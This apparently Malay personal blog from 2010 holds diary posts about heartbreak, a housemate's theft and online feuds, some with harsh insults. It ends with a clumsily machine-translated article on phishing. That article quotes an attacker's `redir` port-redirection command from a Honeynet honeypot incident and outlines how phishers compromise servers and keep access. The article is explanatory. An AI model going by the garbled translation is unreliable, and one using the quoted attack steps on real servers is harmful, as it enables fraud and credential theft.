Monday, December 27, 2010

dear awak...

0

awak awak... ni post kedua utk awk..
sy remove fb awk bkn sbb sy x suke awk.
tp sy x nk sy brharap kt awk.
sy letih dh nk brharap2 ni..
so sy bwt kesimpulan sy remove awk.
kalau ap y sy anggp ni silap, sy mnx maaf.
lama sy tunggu..
tp awk senyap.
so hty sy kate,
remove je la.. nnty skt haty tgk pmpn len komen kt dye..
remove je la.. sbb nnty nmpk dye on9 tp x tgur..
remove je la.. sbb nnty akn menunggu n brharap bnde y xde.

awk, klau awk benarkn sy rndu awk, sy akn rndu awk.
klau awk bnrkn sy syg awk, sy akn syg awk..

sy btul2 mnx maaf awk..
maafkn sy.

sbb sy trlau tkut utk mndengar sesuatu y blh bwt sy jd spt dulu.
sy trlalu letih utk mnghadapi bnde y berulang.
sy x kuat.
emosi sy lemah.
sy cpt trpengaruh.
sy kuat jeles.
sy suke pk y bkn2.
n sy suke bwt org mrh pd sy..
sy btul2 mnx maaf.

Thursday, December 23, 2010

awak, saye sbnrnye......

2

awak, saye sbnrnye jeles bile awk bwt cmtu.
tp x prlu nk jeles. sbb kite bkn ade pape..
awak, sbnrnye saye jeles bile ad pmpn len komen kt wall awk.
tp x prlu nk jeles. sbb tu kn fb awk..

awk,sbnrnye saye risau bile awk 1 ary senyap je.
kene la risau kn, mn tau klau jd pape kt kwn2.
awk, sbnrnye saye risau klau awk dpt posting jauh2.
kene la risau kn, mn tau nnty 1 hry awk akn lupakn saye..

awk, ni entry ptame utk awk. sy blum nk bwt label lagy..

awk, mlm ni je dh 3 mlm straight saye nanes sbb dye..
walaupon saye dok ktawe2, tp aty saye x pon..
tp sy suke tgk wajah awk.
walaupon lawak awk tu menyakitkn haty, tp saye suke..
ini ke y dinamakn cnte?
x mungkin la..
mana mungkin.
dan andai saye katekan inilah cnte, tp pd awk x mungkin.
sy sndiri x abes kenali awk lagy..
tp jujur n ikhlas sy katakan, kalau blh sy ingin awk gantikn tmpt dye..
sy bkn nk gunekn awk utk lupekan dye. tp sy hnye ingin cube utk mencntai lelaki lain. mungkin awk juga seorang y trluka. namun luka pada saya mungkin lebih dalam kerana dye.
awk, sy sbrnye confuse. x tau la..

...

Sunday, December 12, 2010

hate tht i luvyu

0

hate u
hate u
really hate u
really really hate u

what hav i done.
benci kamu. bnci org y bwt saye nanes. really benci kamu.
u r killing me softly..
im dying.
im dying not bcs of i dnt hav u by my side.
but bcs i really hate u.
it really makes me breathless.
why dont just u r the 1 who ends his life..
just die.
mortal die.
ur dead.
but u r still killing me..

Tuesday, December 7, 2010

si bodoh misteri...

3

hahaha.. ape la.. mkin byk plak kontroversi.. cm artis la plak.. (pasan plak.) kang x masal kne lagik.. kuang2..
okies.. gua mls nk bebel byk2.. tp cni gua pacak ape pmpn tu msg gua..



ha.. bnde ni ringkas je.. but sbb ade fan gua tnye ade update x, gua x smpi aty nk hmpekn hrpn fan gua.. (aichewahhh) haha

urmm.. gua tau la gua temok. tp gua temok pon, gua dj rdio y hebat ni.. lu y kate gua temok ni ade?
x de kan.. nth2 on9 pon pnjm lptp org.. hikhik..
gua temok mnx gaji abh lu bwt beli mkn gua ke?
x de kan..
gua temok, gua carik jntn lu ke?
x de kan..
gua temok, gua merempat pnjm lptp n brdbnd org ke?
x de kn..

so, gua ape kesa gua temok ke x..
lu y x rety jage bf kot. n ape y bwt lu asa tgugat ttg gua? msty lu pon ade kelemahan nye pon!! haha
tp gua pelik, gua x tau lu sape.. bf lu, lagik la gua hav no idea.. ape la..
mmg ptt gne nick cmtu.. mmg lu bodoh.. eh. lu x bodoh.. tp lu SUPER BODOH anak kpd MEGA BODOH.

ouh ye.. satu lagik..
kite, klau nk bkawan, x kesa la org tu temok ke, huduh ke, miskin ke. asalkn kite ikhlas nk bkawan. x slh kite nk bkwn dgn sape2.. kwn itu abstrak. so, nasihat gua utk lu, elok lu p amek air smayang, duk ats sejadah, bwt solat taubat. mnx ampun byk2 kt tuhan. pastu, dtg kt gua, mnx maaf sbb ftnah gua rapat2 dgn bf lu.
mak gua x ajo gua kuang ajo dgn org. mak gua ajo respect hak org. tp gua x tau mak lu ajo ke x. n, lu kaji la ape y bwt lu rs trgugat dgn rapatnye bf lu kt gua. gua nk sgt tau lu sape.

gua eppy!!

Monday, December 6, 2010

blog saye dpt award dr shin!! yeay!!

0

tq shin darl~ @kiss





ah-ha. ni dia.. jom scroll down bace.. =)

1) apakah pandangan anda tentang blog hoity-toity ni??
comey! sweet!! tp klau pic bpog owner tu taruk pic kaka pon cun jgak.. haha (just kidding)

2)ucapan utk hoity-toity owner blog ni?
tq shin utk award ni.. =P
pasni kasik lagi byk.. hehe..
take care, blajo rjin2.. jgn men2.. =)
n, the most important is>> luvyu!!

3)adakah anda selalu walking kat blog hoity-toity??
aiyak.. ni nk trus terang.. sbb bru2 ni je kn nk jinak2 on9.. so nnty kite rjin2 usha2 blog kamu.. =P

4)award ni SANTEK?? NTAH PAPE?? BURUK GILE??
nk dress tu.. haha

5)sy tahu anda malas tag so just tag 3 org saja, tak payah byk2, lepas anda tag diorg .. bgtau kat shoutbox msing2:)

suffer8zine


djnana

pahlawanmejapetak


ahaks!! tu saje.. ngeh2

Sunday, December 5, 2010

bile bangsat makin pesat.

2

apebile si bangsat dan keluarge membangsatkan diri serta mnjadi tidak malu selayaknye spt kongkang2 y bru trlepas dr jagaan tukang sihir.. bak mai gua upload je la bhn bukti y gua ade. kalau gua cite pjg, t org x caye. so gua kasik bukti.. lu org ratah la bukti2 tu smbil cicah dgn air asam.. kasik lebih enak..

okies.. sile tatap.. and any typo n grammar mistakes, sorry 4 tht.. =P




















y last tu x rply lagik sbb tunggu partner gua pulang. t gua akn upload lagik..
huh. jgn lu nk men2 ngan gua.

adios!

Saturday, December 4, 2010

panas luar panas dalam. =_='

2

setelah sekian lame x typing myping bru rini ade masa n topik y sgt2 menggugat iman ak sebagai seorang insan. but b4 that,

MOOD: EVIL DEVIL

PART 1...
subjek gua arini>> g dftr modul. dh selesai dftr, gua n bestie gua menapak pulang ke umah sbb keta batman ktorg dlm hotel besi. dh la tgh2 pns gua menapak dgn dua2 jari kelingking kaki gua melecet ala2 pedih gitu gua sabar. dr jauh gua tgk gate x btutup.
gua sentap grill, msuk bilik. nk bukak tudung n tuko baju. gua masuk2, manusia y gua mnx dia tman gua mlm td dh bla. tp grill berlilit dgn rantainye. gua masuk bilik, gua g kt kabinet y gua taruk mp3 sony gua, dwet singgit y ade la beberapa helai, mmg cukup nk bwt sekali melantak dh lesap. memang gua hangin. gua msg tnye betina tu>> mp3 org mane? betina tu siap men sumpah kate x amek. cam SIAL.dia kate dia bla pn tegesa2. buto r. klau iye pon, lu kasik tutup la pntu blk gua. gua kol tnye mn brg gua. gua x tnye pon sal dwet. sbb gua x kesa sgt la stakat singgit2 y beberapa helai tu. tp gua bengang, aset gua, fully ori malaun tu kebas. nk switch off pon x tau, lagy mau kebas. bangsat punye org. y gua pelik, broadband gua y mase gua beli dulu rege dia RM399 x plak dia nk kebas. bodo. baik btul aty pncurik tu. tu pon klau ikut kate dia la kn. n mmg baik plak aty pncurik tu siap lilit kn grill ktorg. y gua ase nk ngamuk, tp mmg gua dh ngamuk la. sbb gua kasik hentak pntu bilik gua smbil jln ke dapur n ulang ke bilik dgn tgn y sakit. bilik belakang n bilik depan x de plak kesan2 org try nk pecah. bodo no penyagak tu klau dia x test sume bilik y ade kt umah. nk2 bilik y ade mangge. klau jantan, dh tntu dia nk kasik pecah jgak. n lappy ni gua tergerak nk park kt bilik blakang mnx tumpang kt bilik mmbr gua. y gua hangin lagik, dh tau tuan umah nk kuar kul 8, dia tebonggeng cam dugong cacat kt katil bilik gua. dgn bau haprak 1 umah. mak ai. mmg gua x ley thn. y plg best, tmpt gua smpn spender, kotak tu mmg cntik la. mcm tmpt smpn brg2 mhl padahal gua smpn spender je kt situ, bekas tu ade kesan kne bukak. mak ai. x cukop ke ko songlap mp3 gua. mangkuk jamban berlumut btul ko ni. x abes marah,gua n kwn gua dikejut kn dgn 1 bnde pns lagik.. jom refer PART 2...

PART 2.
gua n kwn gua mmg dh bwt silap beso selama ni. menanggung manusia x sdr diri. mcm ktorg nk sgt dwet dia. sume org pon bayo deposit tu. x de heboh pon. y selama ni lu g meringkuk menompang umah gua lu x de nk pk plak. dh tu kate gua ajk lu lepak. kite org melayu, x kn la nk tnye>> ko ni x reti2 nk blk asrama ke? dh tntu la ktorg ayt manis>> x pe la.. lepak la dlu.. stay la dlu. ni pon loji punye org. gua punye bele dia, kasik mkn, tlg itu ini, lu nyusahkn ktorg. ape lu pk ktorg dua x mampu nk bayo bhgian lu ke? y selama ni lu emenbeng kt umah ktorg x reti2 nk blk asrama tu aphal? xkn nk tunggu org kate>>> woi.. sedo2 la. g la balik. lame beno ko duk cni dh. bangang. dh tu, dia ngadu kt akak ipar dia. perghh gile koya pmpn tua tu. nk serang2 org, tnye mcm2 pastu tnye>> nape bg tau ni sume eh? bile gua soh scroll up bace blk ape y dia anto, tdiam. adk ipr lu bwt taik ngn gua, gua bg dia loji. kasi cuci itu taik. lu igt, laki lu gedabak cambonzer gua goyang? pui!! bdn beso, ati halus x gune. apsal adik lu x reti nk bela diri? so nasib la. tu bru ckt gua balas. lu tgk nnty lu bwt lagik, gua tmbh. adk lu y x sedo diri, dh numpang, blah cmtu je without ckp nk blk @ tq bwt cm hotel abah dia.puiii!!! jilat ko ludah aku! abah,mak,abg, akak, akak ipar sume sepesen. aty itam. kulit dh longot, aty pon longot. mmg mmbara.. gua mls nk cite pjg sbb kt fb gua nk cite jgak nnty. jom terjah PART 3..

PART 3 baru je jadik ni..
gua dh lame x lepak2 kt fz. gua lepak td gua difahamkan ade kongkang kecik ngutuk2 gua. gua punye psl gua nk suke sape gua nk nyampah kt sape. dulu punye cite, x same dgn skg punye jalan cite. dulu lu cm babi utan, gua lyn jgak. sbb lu user, gua mode. gua kne jage tatasusila mode. tp skg, lu dh jadik babi tunyok tunggal, nk publisiti. lu x suke, lu blah la. y lu dok lagik kt situ aphal? org ban t lu msuk semula. x reti malu? lu sape? gua knal lu pin x. lu nk ckp gua setan aphal? lu bukak mate ckt, bace nick gua kuat2.. SWEET PINK DEVIL BLACK. gua dh ckp, nick gua mewaliki 2 prangai gua. klau lu ok ngan gua, gua sweet2 je lyn lu. lmbut2 je cm kaler pink. tp lu bwt taik ngan gua, gua transform. jadik devil black. sehitam2 sejahat2 uamt gua leyh jadik. bile gua dh jadik setan itam, ape gune lu nk kate gua setan? gua punye psl la. lu baru nk benapas, org len dh brlari. lu jgn nk tnjuk bgus. gua tau lu bwt cite sal gua, gua x segan silu gua main undang2. gua senang je. mls cite pjg.

part1-3 sume kisah pmpn x sedo diri, nyusahkn org, tahap hell punye manusia. haty busuk, dengki khianat tahap jamban berlumut.
amek ko. mmg gua panas aty je rini.

Thursday, September 2, 2010

percaya ada cinta ~ :)

2

huhu..
emosi x berapa nk stabil..
tp, nk bg tau..
baru je abes baca 1 novel ni.. PERCAYA ADA CINTA...
kalau la kn semua llaki cm arsyad zikri tu..
hahaha..
tu dunia novel kn..
jln cerita nye direka oleh manusia..
tp jln cerita kita y nyata, kite cume mencorak. tp DIA y menetukan apa y perlu diterbitkn dan ape y tidak.
mana mungkin seorang insan seperti kita mampu mnjalani jln sesempurna itu.
huhu.. melalut plak dh..

tp.. kehidupan ni x dpt diduga.
kekadang kita x sdr ape y mmbuat kn tibe2 org x bckp dgn kita. sedangkn rasanye x de ape salah y kite bwt.
tp kekadang org plak x tau y perbuatan mrk tu dh mengguris hati kite.
kesimpulan nye, x sume ap y kite bwt tu btul, n x sume ap y org bwt tu dia sdr kesilapan nye.
tp saban hr mkin terasa. andai ade meter penunjuk, mungkin dh x de bacaan dh. infiniti gamaknye.. hahahaha..

mungkin jgak ak y trlalu sensitif. tp biarlah kn.
kekadang perlu jadik lone ranger. mungkin ade n tidak kite dikalangan mereka sikit pn x trkesan. mungkin jika kita x de pn x bwk pape perubahan. mungkin lebih menyenangi andai kita x de berdamping bersama mrk.

manusia berubah. :)

Wednesday, August 25, 2010

aku lesbian????!!!! im not devil mendevil kan diri...

0

hehehehehehe..
slamat berpoce ye kwn2..
berlarinye jemari saye dia atas keyboard ini adalah untuk menaip sesuatu y besh..
hahaha.. tajuk je gempak tu. tp kalau disingkap semule,x de ape y besh sgt.. just ak bru je pas jmpe ngan kengkawan ak y same jantinanye..
n y pling besh, bilik beliau sgt pns hingge ak kne tido kt umah org dlm keadaan berkemban.. hahahah.. dasat tol.. borak punye borak, ak pon trlelap.. tp y plg x besh, tjage sbb pns.. hehe..
pastu, tido smpi kul 7 lbh.. mmg besh.. bergegas ak blk ke umah sewa ak. dgn x mnd nye, dgn bju x iron nye.. eisyh2..

x pe la.. bkn slalu ek.. hahahaha..

yesh!! cuti raye hmpir dekat (cam le umah ak jauh no)..
sbtu ni g mlake.. isnin ni buke ngan klasmate.. smbut merdeka skali kot.. ade mabuk2 x?
hahahahaha.. gurauan jek tu.. bek minum sirap limau, ye x.. ngeh ngeh ngeh...

org kate, bulan poce setan kne ikat.. tp ak pelik.. nape ak n kengkawan leyh trlepas ni? x cukop setan ke kami?? ngeh ngeh ngeh..

tapi kesetanan kami akan lebih teserlah dlm tempoh x smpi sminggu.. ak dh ade plan dh.. tunggu nk laksanekan je.. ngeh3..

buat kamu, kalau kamu boleh kuar buke ngan kwn2, abiskn mase dgn keta kamu, n simpan cdt kamu utk ntah sape, kamu igt2 la saye ye..
~slamat ari raye sayang.. hney luvyu.. ich libe dich so sehr..

Wednesday, August 18, 2010

ade org tabik aku..

0

huahuahua.. x tau la ikhlas ke x kn tabik nye tu. but, klau ikut kate beliau, beliau tabik kt ak, sbb ak still tunggu seseorg tu.. huhu.. bile ht dh syg.. ape pon x jd masalah kn. walaupun kekadang terasa diabaikan. but life must go on bebeyh. kekadang terasa begitu sunyi walaupun ade kengkawan kt sisi.. kekadang kite x puas ati tnpe sebab. itu lah ak. mcm2 perangai pelik ak, y ak baru sedar lately ni. tp kesedaran tu bwt ak gerun lak. huhu. cm bru sedar dr koma. selama 2o thun idup cm pasan x pasan je prangai huduh y ak ade. tp ntah la. mcm best jgak dgn lifestyle y ak ade skg. tp kekadang asa cm hampeh. pointless. kelaka kn..
bak kate adik ak, LAWSAK. huhuhu.. ye kah? ntah. but ak bangge ngan ape y ak dh bwt sepanjang pjalanan ni.. hahahha.. siot je. kije2 jaat pon bangge. hampeh sungguh diri ini.
kepada kwn2, doakn lah pejalanan ak selamat dunia akhirat ye. doa jgak ak berubah. doa jgak ak kmbali pd jln y benar. doa jgak ak btemu jodoh y baik..
ha.. ckp sal jodoh, pnh ak borak ngan kwn ak.. ak mnx, kalau bley, ak nk org y jg ak mcm abg jg ak. amek kesah sal ak cm abg bwt, penyayang cm abg, tegur ak bile ad bwt silap cam abg slalu bwt, x pnh amek ksmptn cm abg. btanggungjwb cm abg. family man cm abg.. pndek kate, sume cm abg. but y x besh, abg tu bz sgt. huh. nyampah.
tp, dia la abg trbaek y adk ad n syg. tp kn abg, adik really luvyu abg.. mmmuahhhh. luv abg.

Monday, August 2, 2010

its fragile =)

2

klau x nk. ckp x nk. saye x tau awk pkse diri @ ape. sy x pnh pkse utk awk trime sy semula. tp andai awk kate " sambung y dulu" utk bwt sy rs lbh truk dr dlu, sy sarankan awk berenti2 la bwt mcm ni. ht saye bukan plastik. bukan juge getah. tapi ia nye sesuatu y mudah pecah. luka akibat pecahnye iye akn mmbuat saye lebih truk dr dlu. jgn gune kn pkataan "busy". nk sribu daye. x nk sejuta dalih. x cukup sekadar awk pki "F" tu. tunjukkn. buktikan. jgn smpi hati saye pecah. dulu hanya retak. jika hati saye pecah, awk x kn mungkin kenal saye lg pas ni. no more NURUL.

Thursday, July 29, 2010

eiiyyyyyyyyyyy.... marah ni!!!

4


fuh.. setelah sekian lamenye (sebulan lebey) x parking kt banglo ni.. huhu.. bz gile. tido pon x cukup 6 jam. gile tol la.
but entry ni nk story sal sambedi.. marah ni.. marah marah..
ade ke patut... ni mmg nk bkire.. print x pnh nk tnye brape nk share. igt ak kt umah cop dwet ke toilet bowl?
dh tu, slide ak cam taik cicak je... ciput macam taik tlinge dia gamaknye. hampeh..
bajet je. awk tu keri. agak2 ler.. klau bwt asemen @ lab report, print semle sem lpas punye, mn x keri cik akak ooiii.. lu pk2 la sndri ek. dh la bcakap x henti2 cam mak nenek. ltey tol dgr. agk2 tgk muke org fedap nk dgr,

akhirnye dpt gak melepak seketika dgn tenet y laju. lptp kt umah cam nazak mnte nyawe je ghoman nye. asek heng je. loan plak, nk g angkt sumpah bagai. klau soh angkt sampah, x pe jgak. eiyyyyy!!!!
asa cm x nk bwt loan je nih..
huhu.. x pe la. ade le hikmah nye tu, ye x..

and y plg besh....
hepi gile sbb abg still amek tau sal ak.
huhu.. adk cayang abg

and to farhan mazlan, luvyu till death syg. gud luck 4 ur test.. and really mish u damn..

~almost turn to 21 =P~

Wednesday, July 14, 2010

Phishing

0

Phishing merupakan satu jenayah siber yang berbentuk skim penipuan untuk pengguna internet.

PHISHING

Tidak boleh disamakan dengan memancing , Pish , atau Phish .

Contoh phishing e-mel, menyamar sebagai seorang pegawai e-mel dari sebuah bank (rekaan). Pengirim berusaha untuk mengelabui penerima agar mendedahkan maklumat sulit dengan "membenarkan" itu di phisher 'website. Perhatikan salah mengeja kata-kata yang diterima dan jurang. kesalahan seperti ini adalah biasa di sebahagian besar phishing email.Juga catat bahawa walaupun URL dari laman web bank tampaknya sah, sebenarnya link ke laman web phisher's.

Di bidang keselamatan komputer , phishing adalah kejahatan penipuan proses cuba untuk mendapatkan maklumat sensitif seperti username, password dan kad kredit dengan butiran menyamar sebagai entiti boleh dipercayai dalam komunikasi elektronik. Komunikasi yang mengaku dari Hangat laman web sosial, situs lelang, prosesor pembayaran online atau pentadbir IT biasanya digunakan untuk menarik awam tidak menaruh curiga. Phishing biasanya dilakukan oleh e-mel atau mesej segera , dan sering mengarahkan pengguna untuk memasukkan butiran di website palsu yang terlihat dan terasa hampir sama dengan yang sah. Bahkan ketika menggunakan pengesahan pelayan , mungkin memerlukan kemahiran luar biasa untuk mengesan bahawa website ini palsu.

Phishing adalah contoh social engineering teknik yang digunakan untuk mengelabui pengguna, dan kegunaan miskin memanfaatkan teknologi keselamatan web saat ini. Usaha untuk menangani peningkatan jumlah melaporkan phishing insiden termasuk perundangan, latihan pengguna, kesedaran awam, dan langkah-langkah keselamatan teknikal.

Teknik phising digambarkan secara terperinci pada tahun 1987, dan penggunaan dicatat pertama dari istilah "phishing" dibuat pada tahun 1996. Istilah ini merupakan varian dari memancing, mungkin dipengaruhi oleh Phreaking , dan menyinggung maklum digunakan untuk "menangkap" maklumat kewangan dan kata laluan.

Teknik phising digambarkan secara terperinci pada tahun 1987, di dalam makalah dan persembahan disampaikan kepada International HPUser Group, Interex. menyebut tercatat pertama dari istilah "phishing" adalah pada service.America-online-alt.online Usenet news group pada tarikh 2 Januari 1996, walaupun istilah mungkin telah muncul sebelumnya dalam edisi cetak dari majalah hacker 2600 .

PHISHING DI AOL

Phishing di AOL sangat erat berkaitan dengan warez masyarakat yang dipertukarkan perisian bajakan dan adegan hacking yang dilakukan penipuan kad kredit dan kejahatan talian lain. Setelah AOL membawa tindakan pada akhir tahun 1995 untuk mengelakkan menggunakan palsu, algorithmically menghasilkan nombor kad kredit untuk membuka akaun, keropok AOL terpaksa phishing piutang yang sah dan pemanfaatan AOL.

Sebuah Phisher mungkin mengaku sebagai ahli kakitangan AOL dan menghantar mesej segera kepada korban berpotensi, meminta dia untuk mendedahkan password. Dalam rangka untuk memikat korban kepada menyerah maklumat sensitif mesej mungkin termasuk keharusan seperti "mengesahkan akaun anda "atau" mengesahkan maklumat bil ". Setelah korban telah mendedahkan password, penyerang boleh mengakses dan menggunakan akaun korban untuk tujuan penipuan atau spam .

Kedua phishing dan warezing di AOL umumnya diwajibkan-ditulis program peribadi, seperti AOHell . Phishing menjadi begitu lazim di AOL bahawa mereka menambah sebuah garisan pada semua mesej segera yang menyatakan: "tidak ada yang bekerja pada AOL akan meminta kata laluan atau maklumat bil", bahkan meskipun hal ini tidak menghalang beberapa orang dari mereka memberikan password dan maklumat peribadi jika mereka membaca dan percaya yang pertama IM. Seorang pengguna menggunakan kedua-dua akaun AIM dan akaun AOL dari ISP secara serentak boleh phish ahli AOL dengan impunitas relatif sebagai akaun AIM internet boleh digunakan oleh bukan-ahli internet AOL dan tidak boleh ditindak (iaitu-dilaporkan kepada jabatan KL AOL untuk disiplin tindakan.)

Selepas tahun 1997, dasar penegakan AOL berhubung dengan phishing dan warez menjadi ketat dan memaksa perisian bajakan dari pelayan AOL. AOL secara serentak mengembangkan sebuah sistem untuk akan mematikan akaun yang terlibat dalam phishing, sering sebelum korban boleh menjawab. Penutupan adegan warez di AOL disebabkan sebahagian besar phisher untuk meninggalkan perkhidmatan, dan banyak phisher-sering muda remaja-tumbuh dari kebiasaan itu.

PERALIHAN DARI AOL UNTUK INSTITUSI KEWANGAN
Penangkapan maklumat akaun AOL mungkin telah membuat phisher untuk maklumat penyalahgunaan kad kredit, dan menyedari bahawa serangan terhadap sistem pembayaran online adalah layak. Upaya langsung dikenali pertama menentang sistem bayaran terpengaruh E-gold pada bulan Jun 2001, yang diikuti dengan id post-9/11 tidak lama selepas serangan September 11 pada World Trade Center . Kedua-duanya dilihat pada saat itu sebagai kegagalan, tapi sekarang boleh dilihat sebagai percubaan awal terhadap serangan berbuah lebih terhadap bank mainstream. Pada tahun 2004, phishing diakui sebagai sebahagian industri sepenuhnya dari ekonomi kejahatan: pakar muncul pada skala global yang menyediakan komponen untuk tunai, yang dihimpun menjadi serangan selesai.

TEKNIK PHISHING

Phisher menyasarkan nisbah bank dan perkhidmatan pembayaran online. E-mail, seharusnya dari Internal Revenue Service , telah digunakan untuk mengumpul data sensitif dari para pembayar cukai AS. Sedangkan contoh pertama yang dihantar tanpa pandang bulu dengan harapan bahawa sesetengah akan diterima oleh nisbah bank tertentu atau perkhidmatan, kajian terkini menunjukkan bahawa phisher mungkin pada prinsipnya dapat menentukan mana bank korban berpotensi digunakan, dan sasaran e-mel palsu yang sesuai. versi Target dari phishing telah disebut tombak phishing. Setiap phishing serangan baru-baru ini telah diarahkan khusus bagi eksekutif senior dan lain-lain profil target tinggi dalam perniagaan, dan perburuan paus istilah telah dicipta bagi jenis serangan.

Halaman rangkaian sosial kini target utama phishing, kerana maklumat peribadi di tapak tersebut dapat digunakan dalam pencurian identiti ; pada akhir tahun 2006 sebuah worm komputermengambil alih halaman di MySpace dan pautan diubah untuk peselancar terus ke laman web yang direka untuk mencuri butiran login. Percubaan menunjukkan tahap kejayaan lebih dari 70% untuk serangan phishing di rangkaian sosial.

The Rapidshare file sharing site telah disasarkan oleh phishing untuk mendapatkan akaun premium, yang menghilangkan topi kelajuan di download, auto-penghapusan Gambar, menunggu di download, dan kali cooldown antara turun.

Penyerang yang masuk ke TD Ameritrade database '(mengandungi semua 6.300.000 pelanggan nombor jaminan sosial , nombor akaun dan alamat email serta nama-nama mereka, alamat, tarikh lahir, nombor telefon dan aktiviti perdagangan) juga ingin akaun username dan password , sehingga mereka melancarkan tindak lanjut tombak serangan phishing.
Hampir setengah daripada phishing pencurian pada tahun 2006 dilakukan oleh kelompok usaha melalui Rangkaian Perniagaan Russia yang berpusat di St Petersburg .

Beberapa orang yang menjadi korban oleh Scam Facebook, link yang diadakan oleh T35 Web Hosting dan orang-orang kehilangan akaun mereka.
Ada anti-phishing website yang menerbitkan mesej yang tepat yang telah baru-baru ini beredar di internet, seperti FraudWatch Antarabangsa dan Millersmiles . halaman tersebut sering memberi butiran khusus mengenai mesej tertentu.

Teknik Phishing pertama – melalui web server dikrompomi

Sebahagian besar serangan phishing yang kita amati di liar melibatkan penyerang melanggar ke pelayan terdedah dan memasang kandungan web yang berbahaya. Honeynet teknologi membolehkan kita untuk menangkap secara terperinci kitaran hidup khas serangan phishing, dan secara umum arus peristiwa yang kita amati selama insiden tersebut adalah sebagai berikut:





• Penyerang scan untuk pelayan terdedah
• Server dikompromikan dan rootkit atau backdoor dipasang terpelihara laluan
• Phisher mendapatkan akses kepada pelayan melalui pintu ini Terenkripsi kembali
• Jika pelayan dikompromikan ialah pelayan web, pre-built laman web phising di-download
• Beberapa tatarajah kandungan terhad dan ujian web halaman dilakukan (berpotensi menunjukkan alamat sejati phisher IP ketika mereka mengakses pelayan web pertama)
• alat email massa turun dan digunakan untuk mengiklan laman web palsu melalui email spam
• lalu lintas Web mula tiba di laman web phising dan potensi korban mengakses kandungan berbahaya

Teknik phising Dua - Phishing Melalui Port Redirection

Pada bulan November 2004, Jerman Honeynet Project dikerahkan klasikHoneynet genius dengan 7,3 honeypot Linux Redhat. Walaupun ini adalah keluaran sistem operasi yang relatif lama dan sasaran empuk bagi penyerang, itu menghairankan memakan masa sekitar 2,5 bulan sebelum honeypot telah berjaya dikompromikan - kontras ditandai dengan kompromi yang relatif cepat dari honeypots dibahaskan dalam insiden di atas. Maklumat lebih lanjut tentang trend ini boleh ditemui dalam kertas putih Kye dahulu " Tahu Musuh anda: Trend ".

Pada bulan Januari 2005 11, penyerang tidak berhasil kompromi honeypot itu, dengan menggunakan mengeksploitasi untuk SSLv2 OpenSSL cacat Pelanggan Kunci Remote Buffer Overflow Vulnerability hadir di 7,3 default Redhat Linux pengedaran. Insiden ini tidak biasa dalam bahawa begitu penyerang telah mendapat akses kepada sistem dikompromikan, tidak ada kandungan phishing adalah naik terus. Sebaliknya, penyerang dipasang dan dikonfigurasikan perkhidmatan redirection port pada honeypot tersebut.

Perkhidmatan ini redirection port direka untuk re-route HTTP permintaan dihantar ke web server lain honeypot web server remote dengan cara yang telus, yang berpotensi membuat lokasi sumber kandungan lebih sukar dikesan. Penyerang didownload dan dipasang alat yang disebut redir pada honeypot, yang merupakan utiliti Redirector port direka untuk Sambungan TCP yang masuk ke depan transparan ke destinasi host remote.

Dalam insiden ini penyerang menatarajah alat untuk mengarahkan ulang seluruh lalu lintas masuk pada port TCP 80 (HTTP) dari honeypot untuk TCP Port 80 (HTTP) pada web server remote di China. Menariknya, penyerang tidak repot-repot memasang rootkit untuk menyembunyikan kehadiran mereka pada honeypot, yang menunjukkan bahawa penyerang tidak menghargai dikompromikan pelayan terlalu tinggi dan bahawa mereka tidak terlalu bimbang tentang menjadi dikesan.

Perintah yang digunakan oleh penyerang untuk menetapkan port redirection adalah:

redir --lport=80 --laddr= --cport=80 --caddr=221.4.XXX.XXX

Selain itu, penyerang mengubahsuai sistem Linux start up file / etc / rc.d / rc.local untuk memastikan bahawa port redir perkhidmatan Redirector akan restart jika sistem honeypot itu reboot, meningkatkan kesempatan hidup untuk perkhidmatan redirection port mereka . Mereka kemudian mula menghantar e-mel spam phishing yang diiklankan pada honeypot, contoh yang boleh dijumpai di sini (perhatikan bahawa maklumat sensitif yang relevan telah dikaburkan).

Untuk lebih mengetahui kegiatan untuk phisher, ahli Projek Honeynet Jerman turun tangan dan diam-diam buat kali terakhir tatarajah alat redir penyerang dipasang pada honeypot itu, membolehkan penebangan dalam aplikasi redir sendiri, untuk lebih mudah mengamati bagaimana orang banyak menerima email spam iklan honeypot dan kemudian mengklik hyperlink untuk mengakses kandungan telus phishing diarahkan.

Dalam waktu sekitar 36 jam, 721 alamat IP yang unik yang diarahkan, dan sekali lagi kami terkejut oleh berapa ramai pengguna yang ternyata ditipu ke dalam mengakses kandungan tersebut melalui email phishing. Analisis alamat IP yang mengakses port Redirector honeypot boleh dijumpai di sini (perhatikan bahawa maklumat ini telah dibersihkan untuk melindungi pengguna yang mengakses kandungan phishing, dan sekali lagi hanya IP data login selama penelitian ini. Tidak ada data rahsia pengguna ditangkap ).

Teknik phising Tiga - Menggunakan Phishing botnet

Kertas putih baru-baru ini oleh Projek Honeynet disebut " Kye: Penjejakan botnet "memperkenalkan kaedah untuk mengesan botnet. botnet adalah rangkaian komputer yang boleh dikompromikan dikendalikan oleh penyerang.Kerana saiz besar mereka (puluhan ribu sistem dapat dihubungkan bersama-sama), botnet boleh menjadi ancaman berat bagi masyarakat apabila digunakan untuk Denial-of-Service (DoS) serangan.

kajian awal di kawasan ini menunjukkan bahawa botnet kadang-kadang digunakan untuk menghantar email spam dan juga boleh digunakan untuk serangan phishing. Selama kajian pada bulan Oktober 2004, email syarikat keselamatan CipherTrustmenyarankan bahawa 70% dari spam phishing dipantau dihantar melalui salah satu daripada lima botnet aktif, tapi hasil pengamatan kita sendiri menunjukkan bahawa lebih banyak botnet digunakan untuk operasi spam.Meskipun tidak analisis satu insiden tunggal, pada bahagian ini kami menyajikan pengamatan kami pada perkakas dan teknik yang digunakan oleh penyerang terbabit dalam phising melalui botnet.

Insiden Timeline
Selama tempoh antara September 2004 dan Januari 2005, Jerman Honeynet Project dikerahkan serangkaian un-patch Microsoft Windows honeypots berasaskan untuk mengamati aktiviti botnet. Sebuah proses automatik dikembangkan untuk membolehkan honeypots harus berkali-kali digunakan, dikompromikan dan shutdown untuk analisis forensik. Selama tempoh ini lebih dari 100 botnet berasingan diamati dan beribu-ribu gambar yang diambil untuk analisis offline.

Analisa
